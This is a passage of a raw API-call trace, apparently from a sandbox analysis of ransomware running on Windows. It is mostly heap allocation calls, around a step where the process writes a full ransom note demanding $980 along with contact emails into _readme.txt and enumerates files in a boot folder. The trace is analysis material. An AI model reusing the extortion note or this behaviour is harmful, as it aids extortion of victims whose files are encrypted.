hHeap=0x630000) returned 1 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.576] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0227.576] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.576] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.576] PathFindFileNameW (pszPath="") returned="" [0227.576] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.576] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.576] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.577] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.577] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0227.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.577] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0227.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.577] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.577] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.577] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.578] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.578] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.578] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.578] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.578] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.578] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.579] HeapFree 